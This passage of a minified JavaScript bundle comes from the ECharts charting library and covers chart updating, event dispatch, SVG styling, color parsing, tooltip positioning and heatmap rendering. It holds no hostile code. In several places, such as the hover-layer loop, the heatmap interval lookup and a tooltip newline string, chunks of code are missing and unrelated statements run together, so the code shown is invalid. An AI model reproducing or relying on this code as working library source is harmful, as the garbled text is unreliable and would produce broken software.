s=n.getViewOfComponentModel(a);if(s&&s.__alive)if(s.updateTransform){var l=s.updateTransform(a,t,i,e);l&&l.update&&r.push(s)}else r.push(s)}));var a=o.createHashMap();t.eachSeries((function(r){var o=n._chartsMap[r.__viewId];if(o.updateTransform){var s=o.updateTransform(r,t,i,e);s&&s.update&&a.set(r.uid,1)}else a.set(r.uid,1)})),pe(t),this._scheduler.performVisualTasks(t,e,{setDirty:!0,dirtyMap:a}),ve(n,t,i,e,a),ye(t,this._api)}},updateView:function(e){var t=this._model;t&&(_.markUpdateMethod(e,"updateView"),pe(t),this._scheduler.performVisualTasks(t,e,{setDirty:!0}),ge(this,this._model,this._api,e),ye(t,this._api))},updateVisual:function(e){oe.update.call(this,e)},updateLayout:function(e){oe.update.call(this,e)}};function ae(e){var t=e._model,n=e._scheduler;n.restorePipelines(t),n.prepareStageTasks(),fe(e,"component",t,n),fe(e,"chart",t,n),n.plan()}function se(e,t,n,i,r){var a=e._model;if(i){var s={};s[i+"Id"]=n[i+"Id"],s[i+"Index"]=n[i+"Index"],s[i+"Name"]=n[i+"Name"];var l={mainType:i,query:s};r&&(l.subType=r);var u=n.excludeSeriesId;null!=u&&(u=o.createHashMap(x.normalizeToArray(u))),a&&a.eachComponent(l,(function(t){u&&null!=u.get(t.id)||c(e["series"===i?"_chartsMap":"_componentsMap"][t.__viewId])}),e)}else E(e._componentsViews.concat(e._chartsViews),c);function c(i){i&&i.__alive&&i[t]&&i[t](i.__model,a,e._api,n)}}function le(e,t){var n=e._chartsMap,i=e._scheduler;t.eachSeries((function(e){i.updateStreamModes(e,n[e.__viewId])}))}function ue(e,t){var n=e.type,i=e.escapeConnect,r=Ae[n],a=r.actionInfo,s=(a.update||"update").split(":"),l=s.pop();s=null!=s[0]&&R(s[0]),this[K]=!0;var u=[e],c=!1;e.batch&&(c=!0,u=o.map(e.batch,(function(t){return t=o.defaults(o.extend({},t),e),t.batch=null,t})));var h,d=[],f="highlight"===n||"downplay"===n;E(u,(function(e){h=r.action(e,this._model,this._api),h=h||o.extend({},e),h.type=a.event||h.type,d.push(h),f?se(this,l,e,"series"):s&&se(this,l,e,s.main,s.sub)}),this),"none"===l||f||s||(this[J]?(ae(this),oe.update.call(this,e),this[J]=!1):oe[l].call(this,e)),h=c?{type:a.event||n,escapeConnect:i,batch:d}:d[0],this[K]=!1,!t&&this._messageCenter.trigger(h.type,h)}function ce(e){var t=this._pendingActions;while(t.length){var n=t.shift();ue.call(this,n,e)}}function he(e){!e&&this.trigger("updated")}function de(e,t){e.on("rendered",(function(){t.trigger("rendered"),!e.animation.isFinished()||t[J]||t._scheduler.unfinished||t._pendingActions.length||t.trigger("finished")}))}function fe(e,t,n,i){for(var r="component"===t,o=r?e._componentsViews:e._chartsViews,a=r?e._componentsMap:e._chartsMap,s=e._zr,l=e._api,u=0;ut.get("hoverLayerThreshold")&&!s.node&&t.eachSeries((function(t){if(!t.preventUsingHoverLayer){var n=e._chartsMap[t.__viewId];n.__alive&&n.group.traverse((function(e){e.useHoverLayer=!0}))}}))}function we(e,t){var n=e.get("blendMode")||null;t.group.traverse((function(e){e.isGroup||e.style.blend!==n&&e.setStyle("blend",n),e.eachPendingDisplayable&&e.eachPendingDisplayable((function(e){e.setStyle("blend",n)}))}))}function ke(e,t){var n=e.get("z"),i=e.get("zlevel");t.group.traverse((function(e){"group"!==e.type&&(null!=n&&(e.z=n),null!=i&&(e.zlevel=i))}))}function Se(e){var t=e._coordSysMgr;return o.extend(new h(e),{getCoordinateSystems:o.bind(t.getCoordinateSystems,t),getComponentByElement:function(t){while(t){var n=t.__ecComponentInfo;if(null!=n)return e._model.getComponent(n.mainType,n.index);t=t.parent}}})}function Me(){this.eventInfo}ie._initEvents=function(){E(_e,(function(e){var t=function(t){var n,i=this.getModel(),r=t.target,a="globalout"===e;if(a)n={};else if(r&&null!=r.dataIndex){var s=r.dataModel||i.getSeriesByIndex(r.seriesIndex);n=s&&s.getDataParams(r.dataIndex,r.dataType,r)||{}}else r&&r.eventData&&(n=o.extend({},r.eventData));if(n){var l=n.componentType,u=n.componentIndex;"markLine"!==l&&"markPoint"!==l&&"markArea"!==l||(l="series",u=n.seriesIndex);var c=l&&null!=u&&i.getComponent(l,u),h=c&&this["series"===c.mainType?"_chartsMap":"_componentsMap"][c.__viewId];n.event=t,n.type=e,this._ecEventProcessor.eventInfo={targetEl:r,packedEvent:n,model:c,view:h},this.trigger(e,n)}};t.zrEventfulCallAtLast=!0,this._zr.on(e,t,this)}),this),E(Ce,(function(e,t){this._messageCenter.on(t,(function(e){this.trigger(t,e)}),this)}),this)},ie.isDisposed=function(){return this._disposed},ie.clear=function(){this._disposed?be(this.id):this.setOption({series:[]},!0)},ie.dispose=function(){if(this._disposed)be(this.id);else{this._disposed=!0,x.setAttribute(this.getDom(),Fe,"");var e=this._api,t=this._model;E(this._componentsViews,(function(n){n.dispose(t,e)})),E(this._chartsViews,(function(n){n.dispose(t,e)})),this._zr.dispose(),delete Pe[this.id]}},o.mixin(ne,u),Me.prototype={constructor:Me,normalizeQuery:function(e){var t={},n={},i={};if(o.isString(e)){var r=R(e);t.mainType=r.main||null,t.subType=r.sub||null}else{var a=["Index","Name","Id"],s={name:1,dataIndex:1,dataType:1};o.each(e,(function(e,r){for(var o=!1,l=0;l0&&c===r.length-u.length){var h=r.slice(0,c);"data"!==h&&(t.mainType=h,t[u.toLowerCase()]=e,o=!0)}}s.hasOwnProperty(r)&&(n[r]=e,o=!0),o||(i[r]=e)}))}return{cptQuery:t,dataQuery:n,otherQuery:i}},filter:function(e,t,n){var i=this.eventInfo;if(!i)return!0;var r=i.targetEl,o=i.packedEvent,a=i.model,s=i.view;if(!a||!s)return!0;var l=t.cptQuery,u=t.dataQuery;return c(l,a,"mainType")&&c(l,a,"subType")&&c(l,a,"index","componentIndex")&&c(l,a,"name")&&c(l,a,"id")&&c(u,o,"name")&&c(u,o,"dataIndex")&&c(u,o,"dataType")&&(!s.filterForExposedEvent||s.filterForExposedEvent(e,t.otherQuery,r,o));function c(e,t,n,i){return null==e[n]||t[i||n]===e[n]}},afterTrigger:function(){this.eventInfo=null}};var Ae={},Ce={},Te=[],Ie=[],De=[],Le=[],Ee={},Oe={},Pe={},Re={},Ne=new Date-0,ze=new Date-0,Fe="_echarts_instance_";function Ve(e){var t=0,n=1,i=2,r="__connectUpdateStatus";function o(e,t){for(var n=0;n-b}function k(e,t){var n=t?e.textFill:e.fill;return null!=n&&n!==f}function S(e,t){var n=t?e.textStroke:e.stroke;return null!=n&&n!==f}function M(e,t){t&&A(e,"transform","matrix("+d.call(t,",")+")")}function A(e,t,n){(!n||"linear"!==n.type&&"radial"!==n.type)&&e.setAttribute(t,n)}function C(e,t,n){e.setAttributeNS("http://www.w3.org/1999/xlink",t,n)}function T(e,t,n,i){if(k(t,n)){var r=n?t.textFill:t.fill;r="transparent"===r?f:r,A(e,"fill",r),A(e,"fill-opacity",null!=t.fillOpacity?t.fillOpacity*t.opacity:t.opacity)}else A(e,"fill",f);if(S(t,n)){var o=n?t.textStroke:t.stroke;o="transparent"===o?f:o,A(e,"stroke",o);var a=n?t.textStrokeWidth:t.lineWidth,s=!n&&t.strokeNoScale?i.getLineScale():1;A(e,"stroke-width",a/s),A(e,"paint-order",n?"stroke":"fill"),A(e,"stroke-opacity",null!=t.strokeOpacity?t.strokeOpacity:t.opacity);var l=t.lineDash;l?(A(e,"stroke-dasharray",t.lineDash.join(",")),A(e,"stroke-dashoffset",p(t.lineDashOffset||0))):A(e,"stroke-dasharray",""),t.lineCap&&A(e,"stroke-linecap",t.lineCap),t.lineJoin&&A(e,"stroke-linejoin",t.lineJoin),t.miterLimit&&A(e,"stroke-miterlimit",t.miterLimit)}else A(e,"stroke",f)}function I(e){for(var t=[],n=e.data,i=e.len(),r=0;r=y:-b>=y),C=b>0?b%y:b%y+y,T=!1;T=!!A||!w(M)&&C>=v===!!S;var I=x(l+c*m(f)),D=x(u+d*g(f));A&&(b=S?y-1e-4:1e-4-y,T=!0,9===r&&t.push("M",I,D));var L=x(l+c*m(f+b)),E=x(u+d*g(f+b));t.push("A",x(c),x(d),p(k*_),+T,+S,L,E);break;case h.Z:a="Z";break;case h.R:L=x(n[r++]),E=x(n[r++]);var O=x(n[r++]),P=x(n[r++]);t.push("M",L,E,"L",L+O,E,"L",L+O,E+P,"L",L,E+P,"L",L,E);break}a&&t.push(a);for(var R=0;RE){for(;D255?255:e}function a(e){return e=Math.round(e),e<0?0:e>360?360:e}function s(e){return e<0?0:e>1?1:e}function l(e){return e.length&&"%"===e.charAt(e.length-1)?o(parseFloat(e)/100*255):o(parseInt(e,10))}function u(e){return e.length&&"%"===e.charAt(e.length-1)?s(parseFloat(e)/100):s(parseFloat(e))}function c(e,t,n){return n<0?n+=1:n>1&&(n-=1),6*n<1?e+(t-e)*n*6:2*n<1?t:3*n<2?e+(t-e)*(2/3-n)*6:e}function h(e,t,n){return e+(t-e)*n}function d(e,t,n,i,r){return e[0]=t,e[1]=n,e[2]=i,e[3]=r,e}function f(e,t){return e[0]=t[0],e[1]=t[1],e[2]=t[2],e[3]=t[3],e}var p=new i(20),g=null;function m(e,t){g&&f(g,t),g=p.put(e,g||t.slice())}function v(e,t){if(e){t=t||[];var n=p.get(e);if(n)return f(t,n);e+="";var i=e.replace(/ /g,"").toLowerCase();if(i in r)return f(t,r[i]),m(e,t),t;if("#"!==i.charAt(0)){var o=i.indexOf("("),a=i.indexOf(")");if(-1!==o&&a+1===i.length){var s=i.substr(0,o),c=i.substr(o+1,a-(o+1)).split(","),h=1;switch(s){case"rgba":if(4!==c.length)return void d(t,0,0,0,1);h=u(c.pop());case"rgb":return 3!==c.length?void d(t,0,0,0,1):(d(t,l(c[0]),l(c[1]),l(c[2]),h),m(e,t),t);case"hsla":return 4!==c.length?void d(t,0,0,0,1):(c[3]=u(c[3]),y(c,t),m(e,t),t);case"hsl":return 3!==c.length?void d(t,0,0,0,1):(y(c,t),m(e,t),t);default:return}}d(t,0,0,0,1)}else{if(4===i.length){var g=parseInt(i.substr(1),16);return g>=0&&g<=4095?(d(t,(3840&g)>>4|(3840&g)>>8,240&g|(240&g)>>4,15&g|(15&g)<<4,1),m(e,t),t):void d(t,0,0,0,1)}if(7===i.length){g=parseInt(i.substr(1),16);return g>=0&&g<=16777215?(d(t,(16711680&g)>>16,(65280&g)>>8,255&g,1),m(e,t),t):void d(t,0,0,0,1)}}}}function y(e,t){var n=(parseFloat(e[0])%360+360)%360/360,i=u(e[1]),r=u(e[2]),a=r<=.5?r*(i+1):r+i-r*i,s=2*r-a;return t=t||[],d(t,o(255*c(s,a,n+1/3)),o(255*c(s,a,n)),o(255*c(s,a,n-1/3)),1),4===e.length&&(t[3]=e[3]),t}function _(e){if(e){var t,n,i=e[0]/255,r=e[1]/255,o=e[2]/255,a=Math.min(i,r,o),s=Math.max(i,r,o),l=s-a,u=(s+a)/2;if(0===l)t=0,n=0;else{n=u<.5?l/(s+a):l/(2-s-a);var c=((s-i)/6+l/2)/l,h=((s-r)/6+l/2)/l,d=((s-o)/6+l/2)/l;i===s?t=d-h:r===s?t=1/3+c-d:o===s&&(t=2/3+h-c),t<0&&(t+=1),t>1&&(t-=1)}var f=[360*t,n,u];return null!=e[3]&&f.push(e[3]),f}}function b(e,t){var n=v(e);if(n){for(var i=0;i<3;i++)n[i]=t<0?n[i]*(1-t)|0:(255-n[i])*t+n[i]|0,n[i]>255?n[i]=255:e[i]<0&&(n[i]=0);return T(n,4===n.length?"rgba":"rgb")}}function x(e){var t=v(e);if(t)return((1<<24)+(t[0]<<16)+(t[1]<<8)+ +t[2]).toString(16).slice(1)}function w(e,t,n){if(t&&t.length&&e>=0&&e<=1){n=n||[];var i=e*(t.length-1),r=Math.floor(i),a=Math.ceil(i),l=t[r],u=t[a],c=i-r;return n[0]=o(h(l[0],u[0],c)),n[1]=o(h(l[1],u[1],c)),n[2]=o(h(l[2],u[2],c)),n[3]=s(h(l[3],u[3],c)),n}}var k=w;function S(e,t,n){if(t&&t.length&&e>=0&&e<=1){var i=e*(t.length-1),r=Math.floor(i),a=Math.ceil(i),l=v(t[r]),u=v(t[a]),c=i-r,d=T([o(h(l[0],u[0],c)),o(h(l[1],u[1],c)),o(h(l[2],u[2],c)),s(h(l[3],u[3],c))],"rgba");return n?{color:d,leftIndex:r,rightIndex:a,value:i}:d}}var M=S;function A(e,t,n,i){if(e=v(e),e)return e=_(e),null!=t&&(e[0]=a(t)),null!=n&&(e[1]=u(n)),null!=i&&(e[2]=u(i)),T(y(e),"rgba")}function C(e,t){if(e=v(e),e&&null!=t)return e[3]=s(t),T(e,"rgba")}function T(e,t){if(e&&e.length){var n=e[0]+","+e[1]+","+e[2];return"rgba"!==t&&"hsva"!==t&&"hsla"!==t||(n+=","+e[3]),t+"("+n+")"}}t.parse=v,t.lift=b,t.toHex=x,t.fastLerp=w,t.fastMapToColor=k,t.lerp=S,t.mapToColor=M,t.modifyHSL=A,t.modifyAlpha=C,t.stringify=T},"428f":function(e,t,n){var i=n("da84");e.exports=i},"42e5":function(e,t){var n=function(e){this.colorStops=e||[]};n.prototype={constructor:n,addColorStop:function(e,t){this.colorStops.push({offset:e,color:t})}};var i=n;e.exports=i},"42f6":function(e,t,n){var i=n("3eba"),r=n("6d8b"),o=n("22d1"),a=n("07d7"),s=n("82f9"),l=n("eda2"),u=n("3842"),c=n("2306"),h=n("133d"),d=n("f934"),f=n("4319"),p=n("17d6"),g=n("697e"),m=n("ff2e"),v=n("e0d3"),y=v.getTooltipRenderMode,_=r.bind,b=r.each,x=u.parsePercent,w=new c.Rect({shape:{x:-1,y:-1,width:2,height:2}}),k=i.extendComponentView({type:"tooltip",init:function(e,t){if(!o.node){var n,i=e.getComponent("tooltip"),r=i.get("renderMode");this._renderMode=y(r),"html"===this._renderMode?(n=new a(t.getDom(),t,{appendToBody:i.get("appendToBody",!0)}),this._newLine="
"):(n=new s(t),this._newLine="\n"),this._tooltipContent=n}},render:function(e,t,n){if(!o.node){this.group.removeAll(),this._tooltipModel=e,this._ecModel=t,this._api=n,this._lastDataByCoordSys=null,this._alwaysShowContent=e.get("alwaysShowContent");var i=this._tooltipContent;i.update(e),i.setEnterable(e.get("enterable")),this._initGlobalListener(),this._keepShow()}},_initGlobalListener:function(){var e=this._tooltipModel,t=e.get("triggerOn");p.register("itemTooltip",this._api,_((function(e,n,i){"none"!==t&&(t.indexOf(e)>=0?this._tryShow(n,i):"leave"===e&&this._hide(i))}),this))},_keepShow:function(){var e=this._tooltipModel,t=this._ecModel,n=this._api;if(null!=this._lastX&&null!=this._lastY&&"none"!==e.get("triggerOn")){var i=this;clearTimeout(this._refreshUpdateTimeout),this._refreshUpdateTimeout=setTimeout((function(){!n.isDisposed()&&i.manuallyShowTip(e,t,n,{x:i._lastX,y:i._lastY})}))}},manuallyShowTip:function(e,t,n,i){if(i.from!==this.uid&&!o.node){var r=M(i,n);this._ticket="";var a=i.dataByCoordSys;if(i.tooltip&&null!=i.x&&null!=i.y){var s=w;s.position=[i.x,i.y],s.update(),s.tooltip=i.tooltip,this._tryShow({offsetX:i.x,offsetY:i.y,target:s},r)}else if(a)this._tryShow({offsetX:i.x,offsetY:i.y,position:i.position,dataByCoordSys:i.dataByCoordSys,tooltipOption:i.tooltipOption},r);else if(null!=i.seriesIndex){if(this._manuallyAxisShowTip(e,t,n,i))return;var l=h(i,t),u=l.point[0],c=l.point[1];null!=u&&null!=c&&this._tryShow({offsetX:u,offsetY:c,position:i.position,target:l.el},r)}else null!=i.x&&null!=i.y&&(n.dispatchAction({type:"updateAxisPointer",x:i.x,y:i.y}),this._tryShow({offsetX:i.x,offsetY:i.y,position:i.position,target:n.getZr().findHover(i.x,i.y).target},r))}},manuallyHideTip:function(e,t,n,i){var r=this._tooltipContent;!this._alwaysShowContent&&this._tooltipModel&&r.hideLater(this._tooltipModel.get("hideDelay")),this._lastX=this._lastY=null,i.from!==this.uid&&this._hide(M(i,n))},_manuallyAxisShowTip:function(e,t,n,i){var r=i.seriesIndex,o=i.dataIndex,a=t.getComponent("axisPointer").coordSysAxesInfo;if(null!=r&&null!=o&&null!=a){var s=t.getSeriesByIndex(r);if(s){var l=s.getData();e=S([l.getItemModel(o),s,(s.coordinateSystem||{}).model,e]);if("axis"===e.get("trigger"))return n.dispatchAction({type:"updateAxisPointer",seriesIndex:r,dataIndex:o,position:i.position}),!0}}},_tryShow:function(e,t){var n=e.target,i=this._tooltipModel;if(i){this._lastX=e.offsetX,this._lastY=e.offsetY;var r=e.dataByCoordSys;r&&r.length?this._showAxisTooltip(r,e):n&&null!=n.dataIndex?(this._lastDataByCoordSys=null,this._showSeriesItemTooltip(e,n,t)):n&&n.tooltip?(this._lastDataByCoordSys=null,this._showComponentItemTooltip(e,n,t)):(this._lastDataByCoordSys=null,this._hide(t))}},_showOrMove:function(e,t){var n=e.get("showDelay");t=r.bind(t,this),clearTimeout(this._showTimout),n>0?this._showTimout=setTimeout(t,n):t()},_showAxisTooltip:function(e,t){var n=this._ecModel,i=this._tooltipModel,o=[t.offsetX,t.offsetY],a=[],s=[],u=S([t.tooltipOption,i]),c=this._renderMode,h=this._newLine,d={};b(e,(function(e){b(e.dataByAxis,(function(e){var t=n.getComponent(e.axisDim+"Axis",e.axisIndex),i=e.value,o=[];if(t&&null!=i){var u=m.getValueLabel(i,t.axis,n,e.seriesDataIndices,e.valueLabelOpt);r.each(e.seriesDataIndices,(function(a){var l=n.getSeriesByIndex(a.seriesIndex),h=a.dataIndexInside,f=l&&l.getDataParams(h);if(f.axisDim=e.axisDim,f.axisIndex=e.axisIndex,f.axisType=e.axisType,f.axisId=e.axisId,f.axisValue=g.getAxisRawValue(t.axis,i),f.axisValueLabel=u,f){s.push(f);var p,m=l.formatTooltip(h,!0,null,c);if(r.isObject(m)){p=m.html;var v=m.markers;r.merge(d,v)}else p=m;o.push(p)}}));var f=u;"html"!==c?a.push(o.join(h)):a.push((f?l.encodeHTML(f)+h:"")+o.join(h))}}))}),this),a.reverse(),a=a.join(this._newLine+this._newLine);var f=t.position;this._showOrMove(u,(function(){this._updateContentNotChangedOnAxis(e)?this._updatePosition(u,f,o[0],o[1],this._tooltipContent,s):this._showTooltipContent(u,a,s,Math.random(),o[0],o[1],f,void 0,d)}))},_showSeriesItemTooltip:function(e,t,n){var i=this._ecModel,o=t.seriesIndex,a=i.getSeriesByIndex(o),s=t.dataModel||a,l=t.dataIndex,u=t.dataType,c=s.getData(u),h=S([c.getItemModel(l),s,a&&(a.coordinateSystem||{}).model,this._tooltipModel]),d=h.get("trigger");if(null==d||"item"===d){var f,p,g=s.getDataParams(l,u),m=s.formatTooltip(l,!1,u,this._renderMode);r.isObject(m)?(f=m.html,p=m.markers):(f=m,p=null);var v="item_"+s.name+"_"+l;this._showOrMove(h,(function(){this._showTooltipContent(h,f,g,v,e.offsetX,e.offsetY,e.position,e.target,p)})),n({type:"showTip",dataIndexInside:l,dataIndex:c.getRawIndex(l),seriesIndex:o,from:this.uid})}},_showComponentItemTooltip:function(e,t,n){var i=t.tooltip;if("string"===typeof i){var r=i;i={content:r,formatter:r}}var o=new f(i,this._tooltipModel,this._ecModel),a=o.get("content"),s=Math.random();this._showOrMove(o,(function(){this._showTooltipContent(o,a,o.get("formatterParams")||{},s,e.offsetX,e.offsetY,e.position,t)})),n({type:"showTip",from:this.uid})},_showTooltipContent:function(e,t,n,i,r,o,a,s,u){if(this._ticket="",e.get("showContent")&&e.get("show")){var c=this._tooltipContent,h=e.get("formatter");a=a||e.get("position");var d=t;if(h&&"string"===typeof h)d=l.formatTpl(h,n,!0);else if("function"===typeof h){var f=_((function(t,i){t===this._ticket&&(c.setContent(i,u,e),this._updatePosition(e,a,r,o,c,n,s))}),this);this._ticket=i,d=h(n,i,f)}c.setContent(d,u,e),c.show(e),this._updatePosition(e,a,r,o,c,n,s)}},_updatePosition:function(e,t,n,i,o,a,s){var l=this._api.getWidth(),u=this._api.getHeight();t=t||e.get("position");var c=o.getSize(),h=e.get("align"),f=e.get("verticalAlign"),p=s&&s.getBoundingRect().clone();if(s&&p.applyTransform(s.transform),"function"===typeof t&&(t=t([n,i],a,o.el,p,{viewSize:[l,u],contentSize:c.slice()})),r.isArray(t))n=x(t[0],l),i=x(t[1],u);else if(r.isObject(t)){t.width=c[0],t.height=c[1];var g=d.getLayoutRect(t,{width:l,height:u});n=g.x,i=g.y,h=null,f=null}else if("string"===typeof t&&s){var m=T(t,p,c);n=m[0],i=m[1]}else{m=A(n,i,o,l,u,h?null:20,f?null:20);n=m[0],i=m[1]}if(h&&(n-=I(h)?c[0]/2:"right"===h?c[0]:0),f&&(i-=I(f)?c[1]/2:"bottom"===f?c[1]:0),e.get("confine")){m=C(n,i,o,l,u);n=m[0],i=m[1]}o.moveTo(n,i)},_updateContentNotChangedOnAxis:function(e){var t=this._lastDataByCoordSys,n=!!t&&t.length===e.length;return n&&b(t,(function(t,i){var r=t.dataByAxis||{},o=e[i]||{},a=o.dataByAxis||[];n&=r.length===a.length,n&&b(r,(function(e,t){var i=a[t]||{},r=e.seriesDataIndices||[],o=i.seriesDataIndices||[];n&=e.value===i.value&&e.axisType===i.axisType&&e.axisId===i.axisId&&r.length===o.length,n&&b(r,(function(e,t){var i=o[t];n&=e.seriesIndex===i.seriesIndex&&e.dataIndex===i.dataIndex}))}))})),this._lastDataByCoordSys=e,!!n},_hide:function(e){this._lastDataByCoordSys=null,e({type:"hideTip",from:this.uid})},dispose:function(e,t){o.node||(this._tooltipContent.dispose(),p.unregister("itemTooltip",t))}});function S(e){var t=e.pop();while(e.length){var n=e.pop();n&&(f.isInstance(n)&&(n=n.get("tooltip",!0)),"string"===typeof n&&(n={formatter:n}),t=new f(n,t,t.ecModel))}return t}function M(e,t){return e.dispatchAction||r.bind(t.dispatchAction,t)}function A(e,t,n,i,r,o,a){var s=n.getOuterSize(),l=s.width,u=s.height;return null!=o&&(e+l+o>i?e-=l+o:e+=o),null!=a&&(t+u+a>r?t-=u+a:t+=a),[e,t]}function C(e,t,n,i,r){var o=n.getOuterSize(),a=o.width,s=o.height;return e=Math.min(e+a,i)-a,t=Math.min(t+s,r)-s,e=Math.max(e,0),t=Math.max(t,0),[e,t]}function T(e,t,n){var i=n[0],r=n[1],o=5,a=0,s=0,l=t.width,u=t.height;switch(e){case"inside":a=t.x+l/2-i/2,s=t.y+u/2-r/2;break;case"top":a=t.x+l/2-i/2,s=t.y-r-o;break;case"bottom":a=t.x+l/2-i/2,s=t.y+u+o;break;case"left":a=t.x-i-o,s=t.y+u/2-r/2;break;case"right":a=t.x+l+o,s=t.y+u/2-r/2}return[a,s]}function I(e){return"center"===e||"middle"===e}e.exports=k},4319:function(e,t,n){var i=n("6d8b"),r=n("22d1"),o=n("e0d3"),a=o.makeInner,s=n("625e"),l=s.enableClassExtend,u=s.enableClassCheck,c=n("3901"),h=n("9bdb"),d=n("fe21"),f=n("551f"),p=i.mixin,g=a();function m(e,t,n){this.parentModel=t,this.ecModel=n,this.option=e}function v(e,t,n){for(var i=0;i=0;i--){a=t[i].interval;if(a[0]<=e&&e<=a[1]){o=i;break}}return i>=0&&i=t[0]&&e<=t[1]}}function c(e){var t=e.dimensions;return"lng"===t[0]&&"lat"===t[1]}var h=r.extendChartView({type:"heatmap",render:function(e,t,n){var i;t.eachComponent("visualMap",(function(t){t.eachTargetSeries((function(n){n===e&&(i=t)}))})),this.group.removeAll(),this._incrementalDisplayable=null;var r=e.coordinateSystem;"cartesian2d"===r.type||"calendar"===r.type?this._renderOnCartesianAndCalendar(e,n,0,e.getData().count()):c(r)&&this._renderOnGeo(r,e,i,n)},incrementalPrepareRender:function(e,t,n){this.group.removeAll()},incrementalRender:function(e,t,n,i){var r=t.coordinateSystem;r&&this._renderOnCartesianAndCalendar(t,i,e.start,e.end,!0)},_renderOnCartesianAndCalendar:function(e,t,n,i,r){var a,l,u=e.coordinateSystem;if("cartesian2d"===u.type){var c=u.getAxis("x"),h=u.getAxis("y");a=c.getBandWidth(),l=h.getBandWidth()}for(var d=this.group,f=e.getData(),p="itemStyle",g="emphasis.itemStyle",m="label",v="emphasis.label",y=e.getModel(p).getItemStyle(["color"]),_=e.getModel(g).getItemStyle(),b=e.getModel(m),x=e.getModel(v),w=u.type,k="cartesian2d"===w?[f.mapDimension("x"),f.mapDimension("y"),f.mapDimension("value")]:[f.mapDimension("time"),f.mapDimension("value")],S=n;S=0?i+=g:i-=g:b>=0?i-=g:i+=g}return i}function p(e,t){var n=[],o=i.quadraticSubdivide,s=[[],[],[]],l=[[],[]],u=[];t/=2,e.eachEdge((function(e,i){var c=e.getLayout(),h=e.getVisual("fromSymbol"),d=e.getVisual("toSymbol");c.__original||(c.__original=[r.clone(c[0]),r.clone(c[1])],c[2]&&c.__original.push(r.clone(c[2])));var p=c.__original;if(null!=c[2]){if(r.copy(s[0],p[0]),r.copy(s[1],p[2]),r.copy(s[2],p[1]),h&&"none"!==h){var g=a(e.node1),m=f(s,p[0],g*t);o(s[0][0],s[1][0],s[2][0],m,n),s[0][0]=n[3],s[1][0]=n[4],o(s[0][1],s[1][1],s[2][1],m,n),s[0][1]=n[3],s[1][1]=n[4]}if(d&&"none"!==d){g=a(e.node2),m=f(s,p[1],g*t);o(s[0][0],s[1][0],s[2][0],m,n),s[1][0]=n[1],s[2][0]=n[2],o(s[0][1],s[1][1],s[2][1],m,n),s[1][1]=n[1],s[2][1]=n[2]}r.copy(c[0],s[0]),r.copy(c[1],s[2]),r.copy(c[2],s[1])}else{if(r.copy(l[0],p[0]),r.copy(l[1],p[1]),r.sub(u,l[1],l[0]),r.normalize(u,u),h&&"none"!==h){g=a(e.node1);r.scaleAndAdd(l[0],l[0],u,g*t)}if(d&&"none"!==d){g=a(e.node2);r.scaleAndAdd(l[1],l[1],u,-g*t)}r.copy(c[0],l[0]),r.copy(c[1],l[1])}}))}e.exports=p},4840:function(e,t,n){var i=n("825a"),r=n("1c0b"),o=n("b622"),a=o("species");e.exports=function(e,t){var n,o=i(e).constructor;return void 0===o||void 0==(n=i(o)[a])?t:r(n)}},"48a9":function(e,t,n){var i=n("6d8b"),r=n("42e5"),o=function(e,t,n,i,o,a){this.x=null==e?0:e,this.y=null==t?0:t,this.x2=null==n?1:n,this.y2=null==i?0:i,this.type="linear",this.global=a||!1,r.call(this,o)};o.prototype={constructor:o},i.inherits(o,r);var a=o;e.exports=a},"48ac":function(e,t,n){var i=n("3eba"),r=i.extendComponentModel({type:"axisPointer",coordSysAxesInfo:null,defaultOption:{show:"auto",triggerOn:null,zlevel:0,z:50,type:"line",snap:!1,triggerTooltip:!0,value:null,status:null,link:[],animation:null,animationDurationUpdate:200,lineStyle:{color:"#aaa",width:1,type:"solid"},shadowStyle:{color:"rgba(150,150,150,0.3)"},label:{show:!0,formatter:null,precision:"auto",margin:3,color:"#fff",padding:[5,7,5,7],backgroundColor:"auto",borderColor:null,borderWidth:0,shadowBlur:3,shadowColor:"#aaa"},handle:{show:!1,icon:"M10.7,11.9v-1.3H9.3v1.3c-4.9,0.3-8.8,4.4-8.8,9.4c0,5,3.9,9.1,8.8,9.4h1.3c4.9-0.3,8.8-4.4,8.8-9.4C19.5,16.3,15.6,12.2,10.7,11.9z M13.3,24.4H6.7v-1.2h6.6z M13.3,22H6.7v-1.2h6.6z M13.3,19.6H6.7v-1.2h6.6z",size:45,margin:50,color:"#333",shadowBlur:3,shadowColor:"#aaa",shadowOffsetX:0,shadowOffsetY:2,throttle:40}}}),o=r;e.exports=o},"48c7":function(e,t,n){var i=n("6d8b"),r=n("6cb7"),o=n("9e47"),a=n("2023"),s=r.extend({type:"cartesian2dAxis",axis:null,init:function(){s.superApply(this,"init",arguments),this.resetRange()},mergeOption:function(){s.superApply(this,"mergeOption",arguments),this.resetRange()},restoreData:function(){s.superApply(this,"restoreData",arguments),this.resetRange()},getCoordSysModel:function(){return this.ecModel.queryComponents({mainType:"grid",index:this.option.gridIndex,id:this.option.gridId})[0]}});function l(e,t){return t.type||(t.data?"category":"value")}i.merge(s.prototype,a);var u={offset:0};o("x",s,l,u),o("y",s,l,u);var c=s;e.exports=c},4930:function(e,t,n){var i=n("d039");e.exports=!!Object.getOwnPropertySymbols&&!i((function(){return!String(Symbol())}))},4942:function(e,t,n){var i=n("2cf4"),r=i.debugMode,o=function(){};1===r&&(o=console.error);var a=o;e.exports=a},"498a":function(e,t,n){"use strict";var i=n("23e7"),r=n("58a8").trim,o=n("c8d2");i({target:"String",proto:!0,forced:o("trim")},{trim:function(){return r(this)}})},"49e8":function(e,t,n){var i=n("3eba"),r=n("6d8b"),o=n("d81e"),a=o.updateCenterAndZoom;i.registerAction({type:"geoRoam",event:"geoRoam",update:"updateTransform"},(function(e,t){var n=e.componentType||"series";t.eachComponent({mainType:n,query:e},(function(t){var i=t.coordinateSystem;if("geo"===i.type){var o=a(i,e,t.get("scaleLimit"));t.setCenter&&t.setCenter(o.center),t.setZoom&&t.setZoom(o.zoom),"series"===n&&r.each(t.seriesGroup,(function(e){e.setCenter(o.center),e.setZoom(o.zoom)}))}}))}))},"4a01":function(e,t,n){var i=n("6d8b"),r=n("1fab"),o=n("607d"),a=n("a4fe");function s(e){this.pointerChecker,this._zr=e,this._opt={};var 